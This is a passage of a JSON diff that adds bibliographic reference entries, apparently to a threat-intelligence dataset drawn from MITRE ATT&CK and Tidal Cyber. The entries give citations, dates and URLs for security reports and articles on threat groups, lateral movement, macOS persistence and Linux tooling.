LAPSUS Apr 2022" + }, + { + "description": "Nelson, M. (2017, September 11). Lateral Movement using Excel.Application and DCOM. Retrieved November 21, 2017.", + "meta": { + "date_accessed": "2017-11-21T00:00:00Z", + "date_published": "2017-09-11T00:00:00Z", + "refs": [ + "https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/" + ], + "source": "MITRE", + "title": "Lateral Movement using Excel.Application and DCOM" + }, + "related": [], + "uuid": "953dc856-d906-4d87-a421-4e708f30208c", + "value": "Enigma Excel DCOM Sept 2017" + }, + { + "description": "Nelson, M. (2017, November 16). Lateral Movement using Outlook's CreateObject Method and DotNetToJScript. Retrieved November 21, 2017.", + "meta": { + "date_accessed": "2017-11-21T00:00:00Z", + "date_published": "2017-11-16T00:00:00Z", + "refs": [ + "https://enigma0x3.net/2017/11/16/lateral-movement-using-outlooks-createobject-method-and-dotnettojscript/" + ], + "source": "MITRE", + "title": "Lateral Movement using Outlook's CreateObject Method and DotNetToJScript" + }, + "related": [], + "uuid": "48c8b8c4-1ce2-4fbc-a95d-dc8b39304200", + "value": "Enigma Outlook DCOM Lateral Movement Nov 2017" + }, + { + "description": "Nelson, M. (2017, January 5). Lateral Movement using the MMC20 Application COM Object. Retrieved November 21, 2017.", + "meta": { + "date_accessed": "2017-11-21T00:00:00Z", + "date_published": "2017-01-05T00:00:00Z", + "refs": [ + "https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/" + ], + "source": "MITRE", + "title": "Lateral Movement using the MMC20 Application COM Object" + }, + "related": [], + "uuid": "ecc1023d-ef37-46e3-8dce-8fd5bb6a10dc", + "value": "Enigma MMC20 COM Jan 2017" + }, + { + "description": "Nelson, M. (2017, January 23). Lateral Movement via DCOM: Round 2. Retrieved November 21, 2017.", + "meta": { + "date_accessed": "2017-11-21T00:00:00Z", + "date_published": "2017-01-23T00:00:00Z", + "refs": [ + "https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/" + ], + "source": "MITRE", + "title": "Lateral Movement via DCOM: Round 2" + }, + "related": [], + "uuid": "62a14d3b-c61b-4c96-ad28-0519745121e3", + "value": "Enigma DCOM Lateral Movement Jan 2017" + }, + { + "description": "Jacobsen, K. (2014, May 16). Lateral Movement with PowerShell[slides]. Retrieved November 12, 2014.", + "meta": { + "date_accessed": "2014-11-12T00:00:00Z", + "date_published": "2014-05-16T00:00:00Z", + "refs": [ + "https://www.slideshare.net/kieranjacobsen/lateral-movement-with-power-shell-2" + ], + "source": "MITRE", + "title": "Lateral Movement with PowerShell[slides]" + }, + "related": [], + "uuid": "f9ca049c-5cab-4d80-a84b-1695365871e3", + "value": "Jacobsen 2014" + }, + { + "description": "SS64. (n.d.). launchctl. Retrieved March 28, 2020.", + "meta": { + "date_accessed": "2020-03-28T00:00:00Z", + "refs": [ + "https://ss64.com/osx/launchctl.html" + ], + "source": "MITRE", + "title": "launchctl" + }, + "related": [], + "uuid": "26bd50ba-c359-4804-b574-7ec731b37fa6", + "value": "Launchctl Man" + }, + { + "description": "Bradley Kemp. (2021, May 10). LaunchDaemon Hijacking: privilege escalation and persistence via insecure folder permissions. Retrieved July 26, 2021.", + "meta": { + "date_accessed": "2021-07-26T00:00:00Z", + "date_published": "2021-05-10T00:00:00Z", + "refs": [ + "https://bradleyjkemp.dev/post/launchdaemon-hijacking/" + ], + "source": "MITRE", + "title": "LaunchDaemon Hijacking: privilege escalation and persistence via insecure folder permissions" + }, + "related": [], + "uuid": "51d1e4d9-265a-48ca-834b-4daa1f386bb4", + "value": "LaunchDaemon Hijacking" + }, + { + "description": "Dennis German. (2020, November 20). launchd Keywords for plists. Retrieved October 7, 2021.", + "meta": { + "date_accessed": "2021-10-07T00:00:00Z", + "date_published": "2020-11-20T00:00:00Z", + "refs": [ + "https://www.real-world-systems.com/docs/launchdPlist.1.html" + ], + "source": "MITRE", + "title": "launchd Keywords for plists" + }, + "related": [], + "uuid": "1bcd2a93-93e7-48d8-ad25-6f09e94123aa", + "value": "launchd Keywords for plists" + }, + { + "description": "Apple. (n.d.). Launch Services. Retrieved October 5, 2021.", + "meta": { + "date_accessed": "2021-10-05T00:00:00Z", + "refs": [ + "https://developer.apple.com/documentation/coreservices/launch_services" + ], + "source": "MITRE", + "title": "Launch Services" + }, + "related": [], + "uuid": "9973ceb1-2fee-451b-a512-c544671ee9fd", + "value": "Launch Services Apple Developer" + }, + { + "description": "Apple. (2018, June 4). Launch Services Keys. Retrieved October 5, 2021.", + "meta": { + "date_accessed": "2021-10-05T00:00:00Z", + "date_published": "2018-06-04T00:00:00Z", + "refs": [ + "https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1" + ], + "source": "MITRE", + "title": "Launch Services Keys" + }, + "related": [], + "uuid": "d75fd3e6-c1cd-4555-b131-80e34f51f09d", + "value": "Launch Service Keys Developer Apple" + }, + { + "description": "LOLBAS. (2022, June 13). Launch-VsDevShell.ps1. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2022-06-13T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Scripts/Launch-VsDevShell/" + ], + "source": "Tidal Cyber", + "title": "Launch-VsDevShell.ps1" + }, + "related": [], + "uuid": "6e81ff6a-a386-495e-bd4b-cf698b02bce8", + "value": "Launch-VsDevShell.ps1 - LOLBAS Project" + }, + { + "description": "Jazi, H. (2021, April 19). Lazarus APT conceals malicious code within BMP image to drop its RAT . Retrieved September 29, 2021.", + "meta": { + "date_accessed": "2021-09-29T00:00:00Z", + "date_published": "2021-04-19T00:00:00Z", + "refs": [ + "https://blog.malwarebytes.com/threat-intelligence/2021/04/lazarus-apt-conceals-malicious-code-within-bmp-file-to-drop-its-rat/" + ], + "source": "MITRE", + "title": "Lazarus APT conceals malicious code within BMP image to drop its RAT" + }, + "related": [], + "uuid": "c531a8dc-ea08-46db-a6d4-754bd1b9d545", + "value": "MalwareBytes Lazarus-Andariel Conceals Code April 2021" + }, + { + "description": "Lei, C., et al. (2018, January 24). Lazarus Campaign Targeting Cryptocurrencies Reveals Remote Controller Tool, an Evolved RATANKBA, and More. Retrieved May 22, 2018.", + "meta": { + "date_accessed": "2018-05-22T00:00:00Z", + "date_published": "2018-01-24T00:00:00Z", + "refs": [ + "https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-campaign-targeting-cryptocurrencies-reveals-remote-controller-tool-evolved-ratankba/" + ], + "source": "MITRE", + "title": "Lazarus Campaign Targeting Cryptocurrencies Reveals Remote Controller Tool, an Evolved RATANKBA, and More" + }, + "related": [], + "uuid": "e3f9853f-29b0-4219-a488-a6ecfa16b09f", + "value": "Lazarus RATANKBA" + }, + { + "description": "Fernando Martinez. (2021, July 6). Lazarus campaign TTPs and evolution. Retrieved September 22, 2021.", + "meta": { + "date_accessed": "2021-09-22T00:00:00Z", + "date_published": "2021-07-06T00:00:00Z", + "refs": [ + "https://cybersecurity.att.com/blogs/labs-research/lazarus-campaign-ttps-and-evolution" + ], + "source": "MITRE", + "title": "Lazarus campaign TTPs and evolution" + }, + "related": [], + "uuid": "594c59ff-c4cb-4164-a62d-120e282b2538", + "value": "ATT Lazarus TTP Evolution" + }, + { + "description": "Trend Micro. (2018, November 20). Lazarus Continues Heists, Mounts Attacks on Financial Organizations in Latin America. Retrieved December 3, 2018.", + "meta": { + "date_accessed": "2018-12-03T00:00:00Z", + "date_published": "2018-11-20T00:00:00Z", + "refs": [ + "https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-continues-heists-mounts-attacks-on-financial-organizations-in-latin-america/" + ], + "source": "MITRE", + "title": "Lazarus Continues Heists, Mounts Attacks on Financial Organizations in Latin America" + }, + "related": [], + "uuid": "4c697316-c13a-4243-be18-c0e059e4168c", + "value": "TrendMicro Lazarus Nov 2018" + }, + { + "description": "F-Secure Labs. (2020, August 18). Lazarus Group Campaign Targeting the Cryptocurrency Vertical. Retrieved September 1, 2020.", + "meta": { + "date_accessed": "2020-09-01T00:00:00Z", + "date_published": "2020-08-18T00:00:00Z", + "refs": [ + "https://labs.f-secure.com/assets/BlogFiles/f-secureLABS-tlp-white-lazarus-threat-intel-report2.pdf" + ], + "source": "MITRE", + "title": "Lazarus Group Campaign Targeting the Cryptocurrency Vertical" + }, + "related": [], + "uuid": "f7facaae-e768-42eb-8e0e-2bfd0a636076", + "value": "F-Secure Lazarus Cryptocurrency Aug 2020" + }, + { + "description": "Kálnai, P., Cherepanov A. (2018, April 03). Lazarus KillDisks Central American casino. Retrieved May 17, 2018.", + "meta": { + "date_accessed": "2018-05-17T00:00:00Z", + "date_published": "2018-04-03T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/2018/04/03/lazarus-killdisk-central-american-casino/" + ], + "source": "MITRE", + "title": "Lazarus KillDisks Central American casino" + }, + "related": [], + "uuid": "454704b7-9ede-4d30-acfd-2cf16a89bcb3", + "value": "ESET Lazarus KillDisk April 2018" + }, + { + "description": "Kálnai, P., Cherepanov A. (2018, April 03). Lazarus KillDisks Central American casino. Retrieved May 17, 2018.", + "meta": { + "date_accessed": "2018-05-17T00:00:00Z", + "date_published": "2018-04-03T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/2018/04/03/lazarus-killdisk-central-american-casino/" + ], + "source": "MITRE", + "title": "Lazarus KillDisks Central American casino" + }, + "related": [], + "uuid": "6f931476-29e6-4bba-ba1b-37ab742f4b49", + "value": "Lazarus KillDisk" + }, + { + "description": "Sherstobitoff, R. (2018, February 12). Lazarus Resurfaces, Targets Global Banks and Bitcoin Users. Retrieved February 19, 2018.", + "meta": { + "date_accessed": "2018-02-19T00:00:00Z", + "date_published": "2018-02-12T00:00:00Z", + "refs": [ + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/" + ], + "source": "MITRE", + "title": "Lazarus Resurfaces, Targets Global Banks and Bitcoin Users" + }, + "related": [], + "uuid": "4e4cb57d-764a-4233-8fc6-d049a1caabe9", + "value": "McAfee Lazarus Resurfaces Feb 2018" + }, + { + "description": "Vyacheslav Kopeytsev and Seongsu Park. (2021, February 25). Lazarus targets defense industry with ThreatNeedle. Retrieved October 27, 2021.", + "meta": { + "date_accessed": "2021-10-27T00:00:00Z", + "date_published": "2021-02-25T00:00:00Z", + "refs": [ + "https://securelist.com/lazarus-threatneedle/100803/" + ], + "source": "MITRE", + "title": "Lazarus targets defense industry with ThreatNeedle" + }, + "related": [], + "uuid": "ba6a5fcc-9391-42c0-8b90-57b729525f41", + "value": "Kaspersky ThreatNeedle Feb 2021" + }, + { + "description": "GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April 17, 2019.", + "meta": { + "date_accessed": "2019-04-17T00:00:00Z", + "date_published": "2017-04-03T00:00:00Z", + "refs": [ + "https://securelist.com/lazarus-under-the-hood/77908/" + ], + "source": "MITRE, Tidal Cyber", + "title": "Lazarus Under the Hood" + }, + "related": [], + "uuid": "a1e1ab6a-8db0-4593-95ec-78784607dfa0", + "value": "Kaspersky Lazarus Under The Hood Blog 2017" + }, + { + "description": "GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved October 3, 2018.", + "meta": { + "date_accessed": "2018-10-03T00:00:00Z", + "date_published": "2017-04-03T00:00:00Z", + "refs": [ + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf" + ], + "source": "MITRE", + "title": "Lazarus Under the Hood" + }, + "related": [], + "uuid": "312b30b1-3bd6-46ea-8f77-504f442499bc", + "value": "Kaspersky Lazarus Under The Hood APR 2017" + }, + { + "description": "Mclellan, M.. (2018, November 19). Lazy Passwords Become Rocket Fuel for Emotet SMB Spreader. Retrieved March 25, 2019.", + "meta": { + "date_accessed": "2019-03-25T00:00:00Z", + "date_published": "2018-11-19T00:00:00Z", + "refs": [ + "https://www.secureworks.com/blog/lazy-passwords-become-rocket-fuel-for-emotet-smb-spreader" + ], + "source": "MITRE", + "title": "Lazy Passwords Become Rocket Fuel for Emotet SMB Spreader" + }, + "related": [], + "uuid": "1ef76c14-f796-409a-9542-762f1e72f9b7", + "value": "Secureworks Emotet Nov 2018" + }, + { + "description": "Jazi, H. (2021, February). LazyScripter: From Empire to double RAT. Retrieved November 24, 2021.", + "meta": { + "date_accessed": "2021-11-24T00:00:00Z", + "date_published": "2021-02-01T00:00:00Z", + "refs": [ + "https://www.malwarebytes.com/resources/files/2021/02/lazyscripter.pdf" + ], + "source": "MITRE, Tidal Cyber", + "title": "LazyScripter: From Empire to double RAT" + }, + "related": [], + "uuid": "078837a7-82cd-4e26-9135-43b612e911fe", + "value": "MalwareBytes LazyScripter Feb 2021" + }, + { + "description": "LOLBAS. (2022, August 31). Ldifde.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2022-08-31T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Ldifde/" + ], + "source": "Tidal Cyber", + "title": "Ldifde.exe" + }, + "related": [], + "uuid": "45d41df9-328c-4ea3-b0fb-fc9f43bdabe5", + "value": "Ldifde.exe - LOLBAS Project" + }, + { + "description": "Microsoft. (2016, August 31). Ldifde Microsoft. Retrieved July 11, 2023.", + "meta": { + "date_accessed": "2023-07-11T00:00:00Z", + "date_published": "2016-08-31T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)" + ], + "source": "Tidal Cyber", + "title": "Ldifde Microsoft" + }, + "related": [], + "uuid": "c47ed0e0-f3e3-41de-9ea7-64fe4e343d9d", + "value": "Ldifde Microsoft" + }, + { + "description": "Symantec Security Response. (2018, July 25). Leafminer: New Espionage Campaigns Targeting Middle Eastern Regions. Retrieved August 28, 2018.", + "meta": { + "date_accessed": "2018-08-28T00:00:00Z", + "date_published": "2018-07-25T00:00:00Z", + "refs": [ + "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east" + ], + "source": "MITRE, Tidal Cyber", + "title": "Leafminer: New Espionage Campaigns Targeting Middle Eastern Regions" + }, + "related": [], + "uuid": "01130af7-a2d4-435e-8790-49933e041451", + "value": "Symantec Leafminer July 2018" + }, + { + "description": "Proofpoint Staff. (2018, March 7). Leaked Ammyy Admin Source Code Turned into Malware. Retrieved May 28, 2019.", + "meta": { + "date_accessed": "2019-05-28T00:00:00Z", + "date_published": "2018-03-07T00:00:00Z", + "refs": [ + "https://www.proofpoint.com/us/threat-insight/post/leaked-ammyy-admin-source-code-turned-malware" + ], + "source": "MITRE", + "title": "Leaked Ammyy Admin Source Code Turned into Malware" + }, + "related": [], + "uuid": "44e48c77-59dd-4851-8455-893513b7cf45", + "value": "Proofpoint TA505 Mar 2018" + }, + { + "description": "Galobardes, R. (2018, October 30). Learn how easy is to bypass firewalls using DNS tunneling (and also how to block it). Retrieved March 15, 2020.", + "meta": { + "date_accessed": "2020-03-15T00:00:00Z", + "date_published": "2018-10-30T00:00:00Z", + "refs": [ + "https://medium.com/@galolbardes/learn-how-easy-is-to-bypass-firewalls-using-dns-tunneling-and-also-how-to-block-it-3ed652f4a000" + ], + "source": "MITRE", + "title": "Learn how easy is to bypass firewalls using DNS tunneling (and also how to block it)" + }, + "related": [], + "uuid": "f31de733-406c-4348-b3fe-bdc30d707277", + "value": "Medium DnsTunneling" + }, + { + "description": "Wojciech Reguła. (2020, June 29). Learn XPC exploitation. Retrieved October 12, 2021.", + "meta": { + "date_accessed": "2021-10-12T00:00:00Z", + "date_published": "2020-06-29T00:00:00Z", + "refs": [ + "https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/" + ], + "source": "MITRE", + "title": "Learn XPC exploitation" + }, + "related": [], + "uuid": "da995792-b78b-4db5-85d8-99fda96c6826", + "value": "Learn XPC Exploitation" + }, + { + "description": "ClearSky Cyber Security. (2021, January). “Lebanese Cedar” APT Global Lebanese Espionage Campaign Leveraging Web Servers. Retrieved February 10, 2021.", + "meta": { + "date_accessed": "2021-02-10T00:00:00Z", + "date_published": "2021-01-01T00:00:00Z", + "refs": [ + "https://www.clearskysec.com/wp-content/uploads/2021/01/Lebanese-Cedar-APT.pdf" + ], + "source": "MITRE", + "title": "“Lebanese Cedar” APT Global Lebanese Espionage Campaign Leveraging Web Servers" + }, + "related": [], + "uuid": "53944d48-caa9-4912-b42d-94a3789ed15b", + "value": "ClearSky Lebanese Cedar Jan 2021" + }, + { + "description": "Tomcik, R. et al. (2022, February 24). Left On Read: Telegram Malware Spotted in Latest Iranian Cyber Espionage Activity. Retrieved August 18, 2022.", + "meta": { + "date_accessed": "2022-08-18T00:00:00Z", + "date_published": "2022-02-24T00:00:00Z", + "refs": [ + "https://www.mandiant.com/resources/telegram-malware-iranian-espionage" + ], + "source": "MITRE", + "title": "Left On Read: Telegram Malware Spotted in Latest Iranian Cyber Espionage Activity" + }, + "related": [], + "uuid": "ac1a1262-1254-4ab2-a940-2d08b6558e9e", + "value": "Mandiant UNC3313 Feb 2022" + }, + { + "description": "Manoj Ahuje. (2022, April 21). LemonDuck Targets Docker for Cryptomining Operations. Retrieved June 30, 2022.", + "meta": { + "date_accessed": "2022-06-30T00:00:00Z", + "date_published": "2022-04-21T00:00:00Z", + "refs": [ + "https://www.crowdstrike.com/blog/lemonduck-botnet-targets-docker-for-cryptomining-operations/" + ], + "source": "MITRE", + "title": "LemonDuck Targets Docker for Cryptomining Operations" + }, + "related": [], + "uuid": "3a7ea56a-3b19-4b69-a206-6eb7c4ae609d", + "value": "LemonDuck" + }, + { + "description": "Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved December 12, 2017.", + "meta": { + "date_accessed": "2017-12-12T00:00:00Z", + "date_published": "2017-12-08T00:00:00Z", + "refs": [ + "https://twitter.com/leoloobeek/status/939248813465853953" + ], + "source": "MITRE", + "title": "leoloobeek Status" + }, + "related": [], + "uuid": "efdbaba5-1713-4ae1-bb82-4b4706f03b87", + "value": "Twitter Leoloobeek Scheduled Task" + }, + { + "description": "Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved October 15, 2020.", + "meta": { + "date_accessed": "2020-10-15T00:00:00Z", + "date_published": "2020-04-23T00:00:00Z", + "refs": [ + "https://letsencrypt.org/docs/faq/" + ], + "source": "MITRE", + "title": "Let's Encrypt FAQ" + }, + "related": [], + "uuid": "96e1ccb9-bd5c-4716-8848-4c30e6eac4ad", + "value": "Let's Encrypt FAQ" + }, + { + "description": "Patrick Wardle. (2016, February 29). Let's Play Doctor: Practical OS X Malware Detection & Analysis. Retrieved July 10, 2017.", + "meta": { + "date_accessed": "2017-07-10T00:00:00Z", + "date_published": "2016-02-29T00:00:00Z", + "refs": [ + "https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf" + ], + "source": "MITRE", + "title": "Let's Play Doctor: Practical OS X Malware Detection & Analysis" + }, + "related": [], + "uuid": "0df0e28a-3c0b-4418-9f5a-77fffe37ac8a", + "value": "OSX Malware Detection" + }, + { + "description": "Ross, Chris. (2018, January 17). Leveraging Emond on macOS For Persistence. Retrieved September 10, 2019.", + "meta": { + "date_accessed": "2019-09-10T00:00:00Z", + "date_published": "2018-01-17T00:00:00Z", + "refs": [ + "https://www.xorrior.com/emond-persistence/" + ], + "source": "MITRE", + "title": "Leveraging Emond on macOS For Persistence" + }, + "related": [], + "uuid": "b49649ec-28f0-4d30-ab6c-13b12fca36e8", + "value": "xorrior emond Jan 2018" + }, + { + "description": "Tsukerman, P. (2017, November 8). Leveraging Excel DDE for lateral movement via DCOM. Retrieved November 21, 2017.", + "meta": { + "date_accessed": "2017-11-21T00:00:00Z", + "date_published": "2017-11-08T00:00:00Z", + "refs": [ + "https://www.cybereason.com/blog/leveraging-excel-dde-for-lateral-movement-via-dcom" + ], + "source": "MITRE", + "title": "Leveraging Excel DDE for lateral movement via DCOM" + }, + "related": [], + "uuid": "6edb3d7d-6b74-4dc4-a866-b81b19810f97", + "value": "Cyberreason DCOM DDE Lateral Movement Nov 2017" + }, + { + "description": "Axel F, Pierre T. (2017, October 16). Leviathan: Espionage actor spearphishes maritime and defense targets. Retrieved February 15, 2018.", + "meta": { + "date_accessed": "2018-02-15T00:00:00Z", + "date_published": "2017-10-16T00:00:00Z", + "refs": [ + "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets" + ], + "source": "MITRE", + "title": "Leviathan: Espionage actor spearphishes maritime and defense targets" + }, + "related": [], + "uuid": "f8c2b67b-c097-4b48-8d95-266a45b7dd4d", + "value": "Proofpoint Leviathan Oct 2017" + }, + { + "description": "Kerrisk, M. (2016, December 12). libc(7) — Linux manual page. Retrieved June 25, 2020.", + "meta": { + "date_accessed": "2020-06-25T00:00:00Z", + "date_published": "2016-12-12T00:00:00Z", + "refs": [ + "https://man7.org/linux/man-pages//man7/libc.7.html" + ], + "source": "MITRE", + "title": "libc(7) — Linux manual page" + }, + "related": [], + "uuid": "a3fe6ea5-c443-473a-bb13-b4fd8f4923fd", + "value": "LIBC" + }, + { + "description": "D. Baron, T. Klausner. (2020). libzip. Retrieved February 20, 2020.", + "meta": { + "date_accessed": "2020-02-20T00:00:00Z", + "date_published": "2020-01-01T00:00:00Z", + "refs": [ + "https://libzip.org/" + ], + "source": "MITRE", + "title": "libzip" + }, + "related": [], + "uuid": "e7008738-101c-4903-a9fc-b0bd28d66069", + "value": "libzip" + }, + { + "description": "Payet, L. (2014, September 19). Life on Mars: How attackers took advantage of hope for alien existance in new Darkmoon campaign. Retrieved September 13, 2018.", + "meta": { + "date_accessed": "2018-09-13T00:00:00Z", + "date_published": "2014-09-19T00:00:00Z", + "refs": [ + "https://www.symantec.com/connect/blogs/life-mars-how-attackers-took-advantage-hope-alien-existance-new-darkmoon-campaign" + ], + "source": "MITRE", + "title": "Life on Mars: How attackers took advantage of hope for alien existance in new Darkmoon campaign" + }, + "related": [], + "uuid": "3362a507-03c3-4236-b484-8144248b5cac", + "value": "Symantec Darkmoon Sept 2014" + }, + { + "description": "Wikipedia. (2016, July 7). Link-Local Multicast Name Resolution. Retrieved November 17, 2017.", + "meta": { + "date_accessed": "2017-11-17T00:00:00Z", + "date_published": "2016-07-07T00:00:00Z", + "refs": [ + "https://en.wikipedia.org/wiki/Link-Local_Multicast_Name_Resolution" + ], + "source": "MITRE", + "title": "Link-Local Multicast Name Resolution" + }, + "related": [], + "uuid": "e06d8b82-f61d-49fc-8120-b6d9e5864cc8", + "value": "Wikipedia LLMNR" + }, + { + "description": "IzySec. (2022, January 26). Linux auditd for Threat Detection. Retrieved September 29, 2023.", + "meta": { + "date_accessed": "2023-09-29T00:00:00Z", + "date_published": "2022-01-26T00:00:00Z", + "refs": [ + "https://izyknows.medium.com/linux-auditd-for-threat-detection-d06c8b941505" + ], + "source": "MITRE", + "title": "Linux auditd for Threat Detection" + }, + "related": [], + "uuid": "8a2f5c37-df28-587e-81b8-4bf7bb796854", + "value": "IzyKnows auditd threat detection 2022" + }, + { + "description": "Doctor Web. (2014, November 21). Linux.BackDoor.Fysbis.1. Retrieved December 7, 2017.", + "meta": { + "date_accessed": "2017-12-07T00:00:00Z", + "date_published": "2014-11-21T00:00:00Z", + "refs": [ + "https://vms.drweb.com/virus/?i=4276269" + ], + "source": "MITRE", + "title": "Linux.BackDoor.Fysbis.1" + }, + "related": [], + "uuid": "f1eb4818-fda6-46f2-9d5a-5469a5ed44fc", + "value": "Fysbis Dr Web Analysis" + }, + { + "description": "McNamara, R. (2017, September 5). Linux Based Inter-Process Code Injection Without Ptrace(2). Retrieved December 20, 2017.", + "meta": { + "date_accessed": "2017-12-20T00:00:00Z", + "date_published": "2017-09-05T00:00:00Z", + "refs": [ + "https://blog.gdssecurity.com/labs/2017/9/5/linux-based-inter-process-code-injection-without-ptrace2.html" + ], + "source": "MITRE", + "title": "Linux Based Inter-Process Code Injection Without Ptrace(2)" + }, + "related": [], + "uuid": "834966eb-d07a-42ea-83db-d6e71b39214c", + "value": "GDSecurity Linux injection" + }, + { + "description": "McNamara, R. (2017, September 5). Linux Based Inter-Process Code Injection Without Ptrace(2). Retrieved February 21, 2020.", + "meta": { + "date_accessed": "2020-02-21T00:00:00Z", + "date_published": "2017-09-05T00:00:00Z", + "refs": [ + "https://blog.gdssecurity.com/labs/2017/9/5/linux-based-inter-process-code-injection-without-ptrace2.html" + ], + "source": "MITRE", + "title": "Linux Based Inter-Process Code Injection Without Ptrace(2)" + }, + "related": [], + "uuid": "3e7f5991-25b4-43e9-9f0b-a5c668fb0657", + "value": "GDS Linux Injection" + }, + { + "description": "Pierre-Marc Bureau. (2013, April 26). Linux/Cdorked.A: New Apache backdoor being used in the wild to serve Blackhole. Retrieved September 10, 2017.", + "meta": { + "date_accessed": "2017-09-10T00:00:00Z", + "date_published": "2013-04-26T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/2013/04/26/linuxcdorked-new-apache-backdoor-in-the-wild-serves-blackhole/" + ], + "source": "MITRE", + "title": "Linux/Cdorked.A: New Apache backdoor being used in the wild to serve Blackhole" + }, + "related": [], + "uuid": "f76fce2e-2884-4b50-a7d7-55f08b84099c", + "value": "Linux/Cdorked.A We Live Security Analysis" + }, + { + "description": "Threat Intelligence Team. (2015, January 6). Linux DDoS Trojan hiding itself with an embedded rootkit. Retrieved January 8, 2018.", + "meta": { + "date_accessed": "2018-01-08T00:00:00Z", + "date_published": "2015-01-06T00:00:00Z", + "refs": [ + "https://blog.avast.com/2015/01/06/linux-ddos-trojan-hiding-itself-with-an-embedded-rootkit/" + ], + "source": "MITRE", + "title": "Linux DDoS Trojan hiding itself with an embedded rootkit" + }, + "related": [], + "uuid": "148fe0e1-8487-4d49-8966-f14e144372f5", + "value": "Avast Linux Trojan Cron Persistence" + }, + { + "description": "Colgan, T. (2015, August 15). Linux-Inject. Retrieved February 21, 2020.", + "meta": { + "date_accessed": "2020-02-21T00:00:00Z", + "date_published": "2015-08-15T00:00:00Z", + "refs": [ + "https://github.com/gaffe23/linux-inject/blob/master/slides_BHArsenal2015.pdf" + ], + "source": "MITRE", + "title": "Linux-Inject" + }, + "related": [], + "uuid": "bdbb2a83-fc3b-439f-896a-75bffada4d51", + "value": "BH Linux Inject" + }, + { + "description": "zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June 25, 2020.", + "meta": { + "date_accessed": "2020-06-25T00:00:00Z", + "date_published": "2018-08-03T00:00:00Z", + "refs": [ + "https://github.com/zephrax/linux-pam-backdoor" + ], + "source": "MITRE", + "title": "linux-pam-backdoor" + }, + "related": [], + "uuid": "da1ffaf1-39f9-4516-8c04-4a4301e13585", + "value": "PAM Backdoor" + }, + { + "description": "The Linux Documentation Project. (n.d.). Linux Password and Shadow File Formats. Retrieved February 19, 2020.", + "meta": { + "date_accessed": "2020-02-19T00:00:00Z", + "refs": [ + "https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html" + ], + "source": "MITRE", + "title": "Linux Password and Shadow File Formats" + }, + "related": [], + "uuid": "7c574609-4b0d-44e7-adc3-8a3d67e10e9f", + "value": "Linux Password and Shadow File Formats" + }, + { + "description": "Vivek Gite. (2014, September 17). Linux Password Cracking: Explain unshadow and john Commands (John the Ripper Tool). Retrieved February 19, 2020.", + "meta": { + "date_accessed": "2020-02-19T00:00:00Z", + "date_published": "2014-09-17T00:00:00Z", + "refs": [ + "https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/" + ], + "source": "MITRE", + "title": "Linux Password Cracking: Explain unshadow and john Commands (John the Ripper Tool)" + }, + "related": [], + "uuid": "5e093b21-8bbd-4ad4-9fe2-cbb04207f1d3", + "value": "nixCraft - John the Ripper" + }, + { + "description": "Carlos Polop. (2023, March 5). Linux Privilege Escalation. Retrieved March 31, 2023.", + "meta": { + "date_accessed": "2023-03-31T00:00:00Z", + "date_published": "2023-03-05T00:00:00Z", + "refs": [ + "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#proc-usdpid-maps-and-proc-usdpid-mem" + ], + "source": "MITRE", + "title": "Linux Privilege Escalation" + }, + "related": [], + "uuid": "a73a2819-61bd-5bd2-862d-5eeed344909f", + "value": "Polop Linux PrivEsc Gitbook" + }, + { + "description": "Michael Kerrisk. (2017, September 15). Linux Programmer's Manual. Retrieved September 21, 2018.", + "meta": { + "date_accessed": "2018-09-21T00:00:00Z", + "date_published": "2017-09-15T00:00:00Z", + "refs": [ + "http://man7.org/linux/man-pages/man2/setuid.2.html" + ], + "source": "MITRE", + "title": "Linux Programmer's Manual" + }, + "related": [], + "uuid": "c07e9d6c-18f2-4246-a265-9bec7d833bba", + "value": "setuid man page" + }, + { + "description": "Kerrisk, M. (2020, June 13). Linux Programmer's Manual. Retrieved June 15, 2020.", + "meta": { + "date_accessed": "2020-06-15T00:00:00Z", + "date_published": "2020-06-13T00:00:00Z", + "refs": [ + "https://www.man7.org/linux/man-pages/man8/ld.so.8.html" + ], + "source": "MITRE", + "title": "Linux Programmer's Manual" + }, + "related": [], + "uuid": "a8a16cf6-0482-4e98-a39a-496491f985df", + "value": "Man LD.SO" + }, + { + "description": "skape. (2003, January 19). Linux x86 run-time process manipulation. Retrieved December 20, 2017.", + "meta": { + "date_accessed": "2017-12-20T00:00:00Z", + "date_published": "2003-01-19T00:00:00Z", + "refs": [ + "http://hick.org/code/skape/papers/needle.txt" + ], + "source": "MITRE", + "title": "Linux x86 run-time process manipulation" + }, + "related": [], + 